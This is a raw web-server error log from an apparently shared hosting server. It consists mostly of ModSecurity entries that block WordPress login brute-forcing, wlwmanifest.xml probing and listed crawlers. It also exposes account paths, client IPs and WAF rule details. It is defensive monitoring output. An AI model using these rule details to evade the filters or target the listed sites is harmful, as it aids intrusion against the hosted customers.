[Tue May 26 19:07:14.833238 2026] [autoindex:error] [pid 6038:tid 6219] [client 43.135.148.92:55392] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:07:15.977047 2026] [security2:error] [pid 6038:tid 6157] [remote 18.219.113.49:56476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiC1HA3ZmGrHHEr4qlFgAApnY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:07:17.209517 2026] [security2:error] [pid 6038:tid 6218] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiDFHA3ZmGrHHEr4qlKwAAALc"]
[Tue May 26 19:07:18.916924 2026] [security2:error] [pid 6038:tid 6192] [client 114.119.138.99:38485] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/images/siliconelevators%20bg05.jpg"] [unique_id "ahWiDlHA3ZmGrHHEr4qlcwAAAJ0"], referer: https://www.siliconelevators.in/siliconelevators-about.php
[Tue May 26 19:07:19.120876 2026] [security2:error] [pid 6038:tid 6265] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiDlHA3ZmGrHHEr4qlbAAAAOY"]
[Tue May 26 19:07:19.267501 2026] [security2:error] [pid 6038:tid 6280] [client 23.158.233.121:50045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWiDlHA3ZmGrHHEr4qlZAAAAPU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 19:07:21.206405 2026] [security2:error] [pid 6038:tid 6205] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiEFHA3ZmGrHHEr4qlqQAAAKo"]
[Tue May 26 19:07:21.309053 2026] [security2:error] [pid 6038:tid 6294] [client 68.183.190.139:53401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWiEFHA3ZmGrHHEr4qlrgAAAQM"]
[Tue May 26 19:07:21.935384 2026] [security2:error] [pid 6038:tid 6292] [client 68.183.190.139:53457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWiEVHA3ZmGrHHEr4qlzgAAAQE"]
[Tue May 26 19:07:23.011714 2026] [security2:error] [pid 6038:tid 6071] [remote 103.11.102.106:50962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiElHA3ZmGrHHEr4ql7wAAyyA"]
[Tue May 26 19:07:23.399214 2026] [security2:error] [pid 6038:tid 6261] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiElHA3ZmGrHHEr4ql8wAAAOI"]
[Tue May 26 19:07:25.277679 2026] [security2:error] [pid 6038:tid 6082] [remote 132.148.72.88:48042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiFVHA3ZmGrHHEr4qmKgAA5ys"]
[Tue May 26 19:07:25.576520 2026] [security2:error] [pid 6038:tid 6176] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiFVHA3ZmGrHHEr4qmLQAAAI0"]
[Tue May 26 19:07:26.186315 2026] [security2:error] [pid 6038:tid 6258] [client 74.7.230.11:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahWiFlHA3ZmGrHHEr4qmTQAAAN8"]
[Tue May 26 19:07:26.187104 2026] [security2:error] [pid 6038:tid 6260] [client 74.7.230.11:50030] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/robots.txt"] [unique_id "ahWiFlHA3ZmGrHHEr4qmSwAA4Tg"]
[Tue May 26 19:07:26.403497 2026] [security2:error] [pid 6038:tid 6087] [remote 132.148.72.88:48042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiFlHA3ZmGrHHEr4qmTwAA0TA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:07:27.431393 2026] [core:crit] [pid 6038:tid 6281] (13)Permission denied: [client 207.46.13.6:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:07:27.715224 2026] [security2:error] [pid 6038:tid 6266] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiF1HA3ZmGrHHEr4qmaQAAAOc"]
[Tue May 26 19:07:27.833540 2026] [core:crit] [pid 6038:tid 6271] (13)Permission denied: [client 207.46.13.6:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:07:28.511387 2026] [security2:error] [pid 6038:tid 6282] [client 185.191.171.2:51778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/list/"] [unique_id "ahWiGFHA3ZmGrHHEr4qmkQAAAPc"]
[Tue May 26 19:07:28.511533 2026] [security2:error] [pid 6038:tid 6282] [client 185.191.171.2:51778] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/list/"] [unique_id "ahWiGFHA3ZmGrHHEr4qmkQAAAPc"]
[Tue May 26 19:07:29.771345 2026] [security2:error] [pid 6038:tid 6261] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiGVHA3ZmGrHHEr4qmsgAAAOI"]
[Tue May 26 19:07:31.236299 2026] [core:crit] [pid 6038:tid 6284] (13)Permission denied: [client 40.77.167.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:07:31.453855 2026] [security2:error] [pid 6038:tid 6248] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiG1HA3ZmGrHHEr4qm3AAAANU"]
[Tue May 26 19:07:31.729731 2026] [security2:error] [pid 6038:tid 6077] [remote 51.91.98.45:57242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWiG1HA3ZmGrHHEr4qnAwAA3yY"]
[Tue May 26 19:07:32.009004 2026] [security2:error] [pid 6038:tid 6124] [remote 51.91.98.45:57242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWiG1HA3ZmGrHHEr4qnFAAApFU"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:07:34.320161 2026] [security2:error] [pid 6038:tid 6198] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiHVHA3ZmGrHHEr4qndQAAAKM"]
[Tue May 26 19:07:34.942386 2026] [security2:error] [pid 6038:tid 6263] [client 202.76.134.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiHlHA3ZmGrHHEr4qnmwAAAOQ"]
[Tue May 26 19:07:36.424582 2026] [security2:error] [pid 6038:tid 6271] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiH1HA3ZmGrHHEr4qn5AAAAOw"]
[Tue May 26 19:07:37.101079 2026] [security2:error] [pid 6038:tid 6260] [client 213.200.31.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWiIFHA3ZmGrHHEr4qn_wAAAOE"]
[Tue May 26 19:07:38.462981 2026] [security2:error] [pid 6038:tid 6190] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiIlHA3ZmGrHHEr4qoNAAAAJs"]
[Tue May 26 19:07:40.654175 2026] [security2:error] [pid 6038:tid 6256] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiJFHA3ZmGrHHEr4qokAAAAN0"]
[Tue May 26 19:07:42.950042 2026] [security2:error] [pid 6038:tid 6172] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiJlHA3ZmGrHHEr4qpDAAAAIk"]
[Tue May 26 19:07:43.105488 2026] [security2:error] [pid 6038:tid 6201] [client 62.244.225.226:13737] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWiJlHA3ZmGrHHEr4qpIAAAAKY"]
[Tue May 26 19:07:44.551340 2026] [security2:error] [pid 6038:tid 6201] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiKFHA3ZmGrHHEr4qpawAAAKY"]
[Tue May 26 19:07:45.635938 2026] [security2:error] [pid 6038:tid 6238] [client 104.194.153.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiKVHA3ZmGrHHEr4qpmgAAAMs"], referer: https://www.anujtradingco.com/
[Tue May 26 19:07:47.184721 2026] [security2:error] [pid 6038:tid 6257] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiKlHA3ZmGrHHEr4qpyQAAAN4"]
[Tue May 26 19:07:47.539087 2026] [security2:error] [pid 6038:tid 6061] [remote 159.89.192.15:56572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.192.89.159.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWiK1HA3ZmGrHHEr4qp1QAAuRY"]
[Tue May 26 19:07:48.633305 2026] [security2:error] [pid 6038:tid 6291] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiLFHA3ZmGrHHEr4qp_QAAAQA"]
[Tue May 26 19:07:48.681500 2026] [security2:error] [pid 6038:tid 6267] [client 104.194.153.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiLFHA3ZmGrHHEr4qqCwAAAOg"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1460507&moderation-hash=383c338c12fc424a1691f21077c966b7
[Tue May 26 19:07:48.971040 2026] [autoindex:error] [pid 6038:tid 6244] [client 198.235.24.46:63856] AH01276: Cannot serve directory /home2/azurm42s/test.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:07:50.735437 2026] [security2:error] [pid 6038:tid 6201] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiLlHA3ZmGrHHEr4qqPwAAAKY"]
[Tue May 26 19:07:51.674257 2026] [security2:error] [pid 6038:tid 6286] [client 104.194.153.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiL1HA3ZmGrHHEr4qqXwAAAPs"], referer: https://anujtradingco.com
[Tue May 26 19:07:53.651058 2026] [security2:error] [pid 6038:tid 6173] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiMVHA3ZmGrHHEr4qqkgAAAIo"]
[Tue May 26 19:07:54.905290 2026] [security2:error] [pid 6038:tid 6228] [client 137.74.16.192:52701] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWiMlHA3ZmGrHHEr4qqxAAAAME"]
[Tue May 26 19:07:55.220902 2026] [security2:error] [pid 6038:tid 6210] [client 185.191.171.2:27210] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWiM1HA3ZmGrHHEr4qqyQAAAK8"]
[Tue May 26 19:07:55.221061 2026] [security2:error] [pid 6038:tid 6210] [client 185.191.171.2:27210] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWiM1HA3ZmGrHHEr4qqyQAAAK8"]
[Tue May 26 19:07:55.425228 2026] [security2:error] [pid 6038:tid 6196] [client 137.74.16.192:52777] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWiM1HA3ZmGrHHEr4qq1gAAAKE"]
[Tue May 26 19:07:55.667960 2026] [security2:error] [pid 6038:tid 6096] [remote 193.42.61.12:57984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWiM1HA3ZmGrHHEr4qq2AAAjjk"]
[Tue May 26 19:07:55.764569 2026] [security2:error] [pid 6038:tid 6235] [client 137.74.16.192:52817] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWiM1HA3ZmGrHHEr4qq3wAAAMg"]
[Tue May 26 19:07:55.770989 2026] [security2:error] [pid 6038:tid 6195] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiM1HA3ZmGrHHEr4qq0gAAAKA"]
[Tue May 26 19:07:56.084965 2026] [security2:error] [pid 6038:tid 6206] [client 137.74.16.192:52847] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNFHA3ZmGrHHEr4qq8AAAAKs"]
[Tue May 26 19:07:56.425777 2026] [security2:error] [pid 6038:tid 6174] [client 137.74.16.192:52866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNFHA3ZmGrHHEr4qq-gAAAIs"]
[Tue May 26 19:07:56.758542 2026] [security2:error] [pid 6038:tid 6198] [client 137.74.16.192:52883] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNFHA3ZmGrHHEr4qq_wAAAKM"]
[Tue May 26 19:07:57.086845 2026] [security2:error] [pid 6038:tid 6263] [client 137.74.16.192:52899] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNVHA3ZmGrHHEr4qrDQAAAOQ"]
[Tue May 26 19:07:57.236235 2026] [security2:error] [pid 6038:tid 6192] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiNFHA3ZmGrHHEr4qrAgAAAJ0"]
[Tue May 26 19:07:57.388089 2026] [security2:error] [pid 6038:tid 6268] [client 51.68.247.202:19420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "strapptech.com"] [uri "/robots.txt"] [unique_id "ahWiNVHA3ZmGrHHEr4qrFgAAAOk"]
[Tue May 26 19:07:57.388180 2026] [security2:error] [pid 6038:tid 6268] [client 51.68.247.202:19420] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "strapptech.com"] [uri "/robots.txt"] [unique_id "ahWiNVHA3ZmGrHHEr4qrFgAAAOk"]
[Tue May 26 19:07:57.411688 2026] [security2:error] [pid 6038:tid 6273] [client 137.74.16.192:52925] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNVHA3ZmGrHHEr4qrFwAAAO4"]
[Tue May 26 19:07:57.748929 2026] [security2:error] [pid 6038:tid 6221] [client 137.74.16.192:52943] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNVHA3ZmGrHHEr4qrIAAAALo"]
[Tue May 26 19:07:58.092342 2026] [security2:error] [pid 6038:tid 6271] [client 137.74.16.192:52956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNlHA3ZmGrHHEr4qrKQAAAOw"]
[Tue May 26 19:07:58.390575 2026] [security2:error] [pid 6038:tid 6127] [remote 43.239.92.149:56974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiNlHA3ZmGrHHEr4qrKgAA_Fg"]
[Tue May 26 19:07:58.416977 2026] [security2:error] [pid 6038:tid 6184] [client 137.74.16.192:52967] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNlHA3ZmGrHHEr4qrLgAAAJU"]
